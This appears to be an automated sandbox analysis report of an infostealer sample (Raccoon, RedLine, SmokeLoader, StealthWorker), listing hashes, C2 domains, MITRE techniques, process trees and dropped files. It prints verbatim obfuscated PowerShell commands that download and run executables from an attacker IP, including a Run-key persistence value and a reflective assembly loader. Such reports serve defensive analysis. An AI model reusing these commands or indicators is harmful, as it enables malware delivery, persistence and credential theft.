raccoon | f24a559e79ba3121c7e0fed4ac995da056fe6a0dac71b2360f9e340b97117d05

Resubmissions

26-08-2021 21:12

210826-flswvxb8js 10

13-08-2021 07:22

210813-9241gpvrbs 10

Analysis

max time kernel
149s
max time network
193s
platform
windows7_x64
resource
win7v20210408
submitted
13-08-2021 07:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

06a029882deabf229f62728afe3baf4f.exe
Size

319KB
MD5

06a029882deabf229f62728afe3baf4f
SHA1

33a5953fbcce8761af1e68df9c9f4ad153c4a536
SHA256

f24a559e79ba3121c7e0fed4ac995da056fe6a0dac71b2360f9e340b97117d05
SHA512

a81631eef6163f437e5bdf83156d26856653411dc6b9becc5580a83b9a4123faec5855d625beec15b1f71c3155624187f776f56b4f58e5f87e9f39bd8b61ba88

Score

10^/10

raccoon redline smokeloader stealthworker 471c70de3b4f9e4d493e418d1f60a90659057de0 backdoor botnet discovery evasion infostealer persistence spyware stealer themida trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://193.56.146.55/Api/GetFile2

Extracted

Family

smokeloader

Version

2020

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

http://readinglistforjuly6.site/

http://readinglistforjuly7.site/

http://readinglistforjuly8.site/

http://readinglistforjuly9.site/

http://readinglistforjuly10.site/

rc4.i32

Extracted

Family

raccoon

Botnet

471c70de3b4f9e4d493e418d1f60a90659057de0

Attributes

url4cnc
https://telete.in/p1rosto100xx

rc4.plain

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon

Raccoon Stealer Payload 4 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1028-163-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon
behavioral1/memory/1028-164-0x000000000044003F-mapping.dmp	family_raccoon
behavioral1/memory/1028-180-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon
behavioral1/memory/1012-181-0x0000000000350000-0x00000000003E1000-memory.dmp	family_raccoon

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
StealthWorker
StealthWorker is golang-based brute force malware.
botnet stealthworker
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

191 1296 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 8 IoCs

Processes:

FD72.exe197.exe3BA.exeRuntimebroker.exe66A.exeD0F.exe66A.exe6608.exe

pid process

380 FD72.exe
1296 197.exe
1516 3BA.exe
1652 Runtimebroker.exe
1284 66A.exe
752 D0F.exe
1028 66A.exe
1012 6608.exe

flow	pid	process
191	1296	powershell.exe

pid	process
380	FD72.exe
1296	197.exe
1516	3BA.exe
1652	Runtimebroker.exe
1284	66A.exe
752	D0F.exe
1028	66A.exe
1012	6608.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

D0F.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	D0F.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	D0F.exe

Deletes itself 1 IoCs

Processes:

pid process

1208

pid	process
1208

Drops startup file 3 IoCs

Processes:

cmd.exeRuntimebroker.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk	Runtimebroker.exe

Loads dropped DLL 4 IoCs

Processes:

197.exeRuntimebroker.exe66A.exe

pid process

1296 197.exe
1296 197.exe
1652 Runtimebroker.exe
1284 66A.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
1296	197.exe
1296	197.exe
1652	Runtimebroker.exe
1284	66A.exe

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\D0F.exe	themida
behavioral1/memory/752-93-0x0000000000120000-0x0000000000121000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://193.56.146.55/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')"	powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

D0F.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA D0F.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

D0F.exe

pid process

752 D0F.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	D0F.exe

pid	process
752	D0F.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

06a029882deabf229f62728afe3baf4f.exe66A.exe

description	pid	process	target process
PID 2000 set thread context of 1700	2000	06a029882deabf229f62728afe3baf4f.exe	06a029882deabf229f62728afe3baf4f.exe
PID 1284 set thread context of 1028	1284	66A.exe	66A.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

06a029882deabf229f62728afe3baf4f.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	06a029882deabf229f62728afe3baf4f.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	06a029882deabf229f62728afe3baf4f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	06a029882deabf229f62728afe3baf4f.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

06a029882deabf229f62728afe3baf4f.exe

pid	process
1700	06a029882deabf229f62728afe3baf4f.exe
1700	06a029882deabf229f62728afe3baf4f.exe
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208
1208

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

1208
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

06a029882deabf229f62728afe3baf4f.exe

pid process

1700 06a029882deabf229f62728afe3baf4f.exe

pid	process
1208

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

D0F.exepowershell.exepowershell.exepowershell.exe66A.exe

description	pid	process
Token: SeShutdownPrivilege	1208
Token: SeShutdownPrivilege	1208
Token: SeDebugPrivilege	752	D0F.exe
Token: SeDebugPrivilege	1784	powershell.exe
Token: SeDebugPrivilege	1296	powershell.exe
Token: SeDebugPrivilege	1632	powershell.exe
Token: SeDebugPrivilege	1284	66A.exe

Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

pid process

1208
1208
1208
1208
Suspicious use of SendNotifyMessage 8 IoCs

Processes:

pid process

1208
1208
1208
1208
1208
1208
1208
1208
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

FD72.exe

pid process

380 FD72.exe

pid	process
1208
1208
1208
1208

pid	process
1208
1208
1208
1208
1208
1208
1208
1208

pid	process
380	FD72.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

06a029882deabf229f62728afe3baf4f.exe197.exe3BA.exeRuntimebroker.exepowershell.exe66A.exe

description	pid	process	target process
PID 2000 wrote to memory of 1700	2000	06a029882deabf229f62728afe3baf4f.exe	06a029882deabf229f62728afe3baf4f.exe
PID 2000 wrote to memory of 1700	2000	06a029882deabf229f62728afe3baf4f.exe	06a029882deabf229f62728afe3baf4f.exe
PID 2000 wrote to memory of 1700	2000	06a029882deabf229f62728afe3baf4f.exe	06a029882deabf229f62728afe3baf4f.exe
PID 2000 wrote to memory of 1700	2000	06a029882deabf229f62728afe3baf4f.exe	06a029882deabf229f62728afe3baf4f.exe
PID 2000 wrote to memory of 1700	2000	06a029882deabf229f62728afe3baf4f.exe	06a029882deabf229f62728afe3baf4f.exe
PID 2000 wrote to memory of 1700	2000	06a029882deabf229f62728afe3baf4f.exe	06a029882deabf229f62728afe3baf4f.exe
PID 2000 wrote to memory of 1700	2000	06a029882deabf229f62728afe3baf4f.exe	06a029882deabf229f62728afe3baf4f.exe
PID 1208 wrote to memory of 380	1208		FD72.exe
PID 1208 wrote to memory of 380	1208		FD72.exe
PID 1208 wrote to memory of 380	1208		FD72.exe
PID 1208 wrote to memory of 380	1208		FD72.exe
PID 1208 wrote to memory of 1296	1208		197.exe
PID 1208 wrote to memory of 1296	1208		197.exe
PID 1208 wrote to memory of 1296	1208		197.exe
PID 1208 wrote to memory of 1296	1208		197.exe
PID 1208 wrote to memory of 1516	1208		3BA.exe
PID 1208 wrote to memory of 1516	1208		3BA.exe
PID 1208 wrote to memory of 1516	1208		3BA.exe
PID 1208 wrote to memory of 1516	1208		3BA.exe
PID 1296 wrote to memory of 1652	1296	197.exe	Runtimebroker.exe
PID 1296 wrote to memory of 1652	1296	197.exe	Runtimebroker.exe
PID 1296 wrote to memory of 1652	1296	197.exe	Runtimebroker.exe
PID 1296 wrote to memory of 1652	1296	197.exe	Runtimebroker.exe
PID 1208 wrote to memory of 1284	1208		66A.exe
PID 1208 wrote to memory of 1284	1208		66A.exe
PID 1208 wrote to memory of 1284	1208		66A.exe
PID 1208 wrote to memory of 1284	1208		66A.exe
PID 1208 wrote to memory of 752	1208		D0F.exe
PID 1208 wrote to memory of 752	1208		D0F.exe
PID 1208 wrote to memory of 752	1208		D0F.exe
PID 1208 wrote to memory of 752	1208		D0F.exe
PID 1208 wrote to memory of 752	1208		D0F.exe
PID 1208 wrote to memory of 752	1208		D0F.exe
PID 1208 wrote to memory of 752	1208		D0F.exe
PID 1516 wrote to memory of 1504	1516	3BA.exe	cmd.exe
PID 1516 wrote to memory of 1504	1516	3BA.exe	cmd.exe
PID 1516 wrote to memory of 1504	1516	3BA.exe	cmd.exe
PID 1516 wrote to memory of 1504	1516	3BA.exe	cmd.exe
PID 1652 wrote to memory of 1784	1652	Runtimebroker.exe	powershell.exe
PID 1652 wrote to memory of 1784	1652	Runtimebroker.exe	powershell.exe
PID 1652 wrote to memory of 1784	1652	Runtimebroker.exe	powershell.exe
PID 1652 wrote to memory of 1784	1652	Runtimebroker.exe	powershell.exe
PID 1652 wrote to memory of 1296	1652	Runtimebroker.exe	powershell.exe
PID 1652 wrote to memory of 1296	1652	Runtimebroker.exe	powershell.exe
PID 1652 wrote to memory of 1296	1652	Runtimebroker.exe	powershell.exe
PID 1652 wrote to memory of 1296	1652	Runtimebroker.exe	powershell.exe
PID 1296 wrote to memory of 1632	1296	powershell.exe	powershell.exe
PID 1296 wrote to memory of 1632	1296	powershell.exe	powershell.exe
PID 1296 wrote to memory of 1632	1296	powershell.exe	powershell.exe
PID 1296 wrote to memory of 1632	1296	powershell.exe	powershell.exe
PID 1284 wrote to memory of 1028	1284	66A.exe	66A.exe
PID 1284 wrote to memory of 1028	1284	66A.exe	66A.exe
PID 1284 wrote to memory of 1028	1284	66A.exe	66A.exe
PID 1284 wrote to memory of 1028	1284	66A.exe	66A.exe
PID 1284 wrote to memory of 1028	1284	66A.exe	66A.exe
PID 1284 wrote to memory of 1028	1284	66A.exe	66A.exe
PID 1284 wrote to memory of 1028	1284	66A.exe	66A.exe
PID 1284 wrote to memory of 1028	1284	66A.exe	66A.exe
PID 1284 wrote to memory of 1028	1284	66A.exe	66A.exe
PID 1284 wrote to memory of 1028	1284	66A.exe	66A.exe
PID 1208 wrote to memory of 1012	1208		6608.exe
PID 1208 wrote to memory of 1012	1208		6608.exe
PID 1208 wrote to memory of 1012	1208		6608.exe
PID 1208 wrote to memory of 1012	1208		6608.exe

C:\Users\Admin\AppData\Local\Temp\06a029882deabf229f62728afe3baf4f.exe
"C:\Users\Admin\AppData\Local\Temp\06a029882deabf229f62728afe3baf4f.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2000

C:\Users\Admin\AppData\Local\Temp\06a029882deabf229f62728afe3baf4f.exe
"C:\Users\Admin\AppData\Local\Temp\06a029882deabf229f62728afe3baf4f.exe"
2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1700

C:\Users\Admin\AppData\Local\Temp\FD72.exe
C:\Users\Admin\AppData\Local\Temp\FD72.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:380

C:\Users\Admin\AppData\Local\Temp\197.exe
C:\Users\Admin\AppData\Local\Temp\197.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1296

C:\ProgramData\Runtimebroker.exe
"C:\ProgramData\Runtimebroker.exe"
2⤵
- Executes dropped EXE
- Drops startup file
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1652

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://193.56.146.55/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
3⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:1784

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://193.56.146.55/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method
3⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1296

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1632

C:\Users\Admin\AppData\Local\Temp\3BA.exe
C:\Users\Admin\AppData\Local\Temp\3BA.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1516

C:\Windows\SysWOW64\cmd.exe
cmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat
2⤵
- Drops startup file
PID:1504

C:\Users\Admin\AppData\Local\Temp\66A.exe
C:\Users\Admin\AppData\Local\Temp\66A.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1284

C:\Users\Admin\AppData\Local\Temp\66A.exe
C:\Users\Admin\AppData\Local\Temp\66A.exe
2⤵
- Executes dropped EXE
PID:1028

C:\Users\Admin\AppData\Local\Temp\D0F.exe
C:\Users\Admin\AppData\Local\Temp\D0F.exe
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:752

C:\Users\Admin\AppData\Local\Temp\6608.exe
C:\Users\Admin\AppData\Local\Temp\6608.exe
1⤵
- Executes dropped EXE
PID:1012

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1772

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Runtimebroker.exe
MD5
ab2f76d60587996ba3cd8782785caaa5

SHA1
0ff116d90610baae4db4d72f6ac11989b7a0e420

SHA256
34a8beebd1799b5fb7b9651fc77e8ce7261b111bd3d91ccb8558910925aa2db7

SHA512
c2e71e373c0ca83dc4b3e045a765dc35cee35549d84250911c78d13c2191d1a836a9554bd63e5faae78a3393a3d86d7e432f05a2caf9c0c224d0d50673cc5392

Download Submit
C:\ProgramData\Runtimebroker.exe
MD5
ab2f76d60587996ba3cd8782785caaa5

SHA1
0ff116d90610baae4db4d72f6ac11989b7a0e420

SHA256
34a8beebd1799b5fb7b9651fc77e8ce7261b111bd3d91ccb8558910925aa2db7

SHA512
c2e71e373c0ca83dc4b3e045a765dc35cee35549d84250911c78d13c2191d1a836a9554bd63e5faae78a3393a3d86d7e432f05a2caf9c0c224d0d50673cc5392

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_10a2719f-ab19-452c-9537-375fecbe5f96
MD5
df44874327d79bd75e4264cb8dc01811

SHA1
1396b06debed65ea93c24998d244edebd3c0209d

SHA256
55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

SHA512
95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1abda922-9e0e-4200-89d0-60796083afcc
MD5
be4d72095faf84233ac17b94744f7084

SHA1
cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

SHA256
b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

SHA512
43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_32b21970-4839-4ac5-a2ad-cc925aecc47c
MD5
a725bb9fafcf91f3c6b7861a2bde6db2

SHA1
8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

SHA256
51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

SHA512
1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_60554f64-a36e-4439-8748-76f202d7cb75
MD5
02ff38ac870de39782aeee04d7b48231

SHA1
0390d39fa216c9b0ecdb38238304e518fb2b5095

SHA256
fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

SHA512
24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6ccb18ff-7a22-469e-90e7-ccc861e1432b
MD5
b6d38f250ccc9003dd70efd3b778117f

SHA1
d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

SHA256
4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

SHA512
67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7bc5ca8a-50eb-4a28-856a-31595e01418a
MD5
597009ea0430a463753e0f5b1d1a249e

SHA1
4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62

SHA256
3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d

SHA512
5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bd47eb21-a96b-4ccd-99d7-0d9f3f6c10b6
MD5
75a8da7754349b38d64c87c938545b1b

SHA1
5c28c257d51f1c1587e29164cc03ea880c21b417

SHA256
bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

SHA512
798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c9b427a0-6073-4eb8-9b09-f8e4712d7ab5
MD5
5e3c7184a75d42dda1a83606a45001d8

SHA1
94ca15637721d88f30eb4b6220b805c5be0360ed

SHA256
8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

SHA512
fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
9e551e01a21e8bb5843ffc1155178a4c

SHA1
247aa3c4beb77405661472756a6278b9eabf2155

SHA256
8cef9d372d3319f411c3020ff3a2797e524e2e0f41662b64a99cdff442a36ffd

SHA512
8ab52c6235ba485bf956f6a5dd56fd054133fd8fbc4645f0d16c1bf650ca0ded63f4e3ec2adc62a8f9f724e57f2f8736535a93bc0590f75bde84be601dd3615d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
4b1670890bcc0b2fc2d47c54a9df560d

SHA1
a252777394808dc7eb9e927e9ff0b6686bd3de0b

SHA256
e9cd7131fd71760a098525ac630dfd968ab04abeb73199a5f7dc8ef8848c0972

SHA512
246c97ad483b7f1144774396d532f5da9897353883db16481367f80cc0fa72f9ad8b2b66d7ea5f81b142d2712dadb441886bb17917b788672a62d407c6cf5823

Download Submit
C:\Users\Admin\AppData\Local\Temp\197.exe
MD5
ab2f76d60587996ba3cd8782785caaa5

SHA1
0ff116d90610baae4db4d72f6ac11989b7a0e420

SHA256
34a8beebd1799b5fb7b9651fc77e8ce7261b111bd3d91ccb8558910925aa2db7

SHA512
c2e71e373c0ca83dc4b3e045a765dc35cee35549d84250911c78d13c2191d1a836a9554bd63e5faae78a3393a3d86d7e432f05a2caf9c0c224d0d50673cc5392

Download Submit
C:\Users\Admin\AppData\Local\Temp\197.exe
MD5
ab2f76d60587996ba3cd8782785caaa5

SHA1
0ff116d90610baae4db4d72f6ac11989b7a0e420

SHA256
34a8beebd1799b5fb7b9651fc77e8ce7261b111bd3d91ccb8558910925aa2db7

SHA512
c2e71e373c0ca83dc4b3e045a765dc35cee35549d84250911c78d13c2191d1a836a9554bd63e5faae78a3393a3d86d7e432f05a2caf9c0c224d0d50673cc5392

Download Submit
C:\Users\Admin\AppData\Local\Temp\3BA.exe
MD5
b19ac380411ed5d8b5a7e7e0c1da61a6

SHA1
9665c20336a5ce437bbf7b564370bfa43e99954c

SHA256
aba88a19b2f6e2cf9a6a41ab8661d83c433acec363028f58dd74d37e335c7619

SHA512
73b4e3555cf9496a7138a2c7071ed81a754493afaf15f604a305f3eb051ed72645731a6174b0934f24371dbe5bd8c0185516f87778a018d84df4fff8aea0c208

Download Submit
C:\Users\Admin\AppData\Local\Temp\3BA.exe
MD5
b19ac380411ed5d8b5a7e7e0c1da61a6

SHA1
9665c20336a5ce437bbf7b564370bfa43e99954c

SHA256
aba88a19b2f6e2cf9a6a41ab8661d83c433acec363028f58dd74d37e335c7619

SHA512
73b4e3555cf9496a7138a2c7071ed81a754493afaf15f604a305f3eb051ed72645731a6174b0934f24371dbe5bd8c0185516f87778a018d84df4fff8aea0c208

Download Submit
C:\Users\Admin\AppData\Local\Temp\6608.exe
MD5
86f3431da4c9f0e9bad6c71aab03ec60

SHA1
3a94f295514a29e772932a005bc54a77de3d3610

SHA256
b7264c22c5d356ad379f426e67230d2d4d6ebbeddf5a155ee5e94fbbcd28a99f

SHA512
5ed65233b0ac1cc45d959066a173da5b47e44141ef76ddde1c22ecc76f0b88594e105884f9846c049538ad3becb01c699a045051699fa96b64f3b956c2d78861

Download Submit
C:\Users\Admin\AppData\Local\Temp\66A.exe
MD5
5707ddada5b7ea6bef434cd294fa12e1

SHA1
45bb285a597b30e100ed4b15d96a29d718697e5e

SHA256
85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c

SHA512
91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13

Download Submit
C:\Users\Admin\AppData\Local\Temp\66A.exe
MD5
5707ddada5b7ea6bef434cd294fa12e1

SHA1
45bb285a597b30e100ed4b15d96a29d718697e5e

SHA256
85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c

SHA512
91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13

Download Submit
C:\Users\Admin\AppData\Local\Temp\66A.exe
MD5
5707ddada5b7ea6bef434cd294fa12e1

SHA1
45bb285a597b30e100ed4b15d96a29d718697e5e

SHA256
85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c

SHA512
91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13

Download Submit
C:\Users\Admin\AppData\Local\Temp\D0F.exe
MD5
717d65dba56f47e540dca074c3977b3d

SHA1
d58aa30f826f41663e693f0ad930fdce584f1672

SHA256
61fb1160ae372d9ba1c95400d5439450c6a66cdf073fa50ee2d5d10c4952cbb3

SHA512
b06e4358411eb8f6315c574922c021bd57218b3e6a0ed727df6b44e20e7818d40fb0347050ce9145ea7e0fd56a7fa93a2358e524c0df030d6d44067c7c83510d

Download Submit
C:\Users\Admin\AppData\Local\Temp\FD72.exe
MD5
a69e12607d01237460808fa1709e5e86

SHA1
4a12f82aee1c90e70cdf6be863ce1a749c8ae411

SHA256
188e05efb42c1f7fdb5c910a6614f710a87ae642b23ac9ffe3f75246744865bc

SHA512
7533e6da6bac0405fc8b608da8020b54b6ee02592e6fd40ea342e130a8a876ae5ef4a1fd636d95e76339dbf8be45cecbd22ca2d0a4635b055ffafec3d7e15284

Download Submit
C:\Users\Admin\AppData\Local\Temp\s.bat
MD5
2298656a677657972dcd422d6ffa8d57

SHA1
2b0726587d8f606c4dbf5b8478c1f7be3b87e895

SHA256
d3f3a50a8d15c5cba7d587e5f11243f1b4932d72744a2cd8f75aef17f57de5ba

SHA512
7276701c24f3920ebd06f2bc662adaa88e83a1b93d746bc3666292e730ac1ef56860b83fa1861cc525b3c81af04d6c8ab05de82e0ff74d11e1a67e1a1bd9f89c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
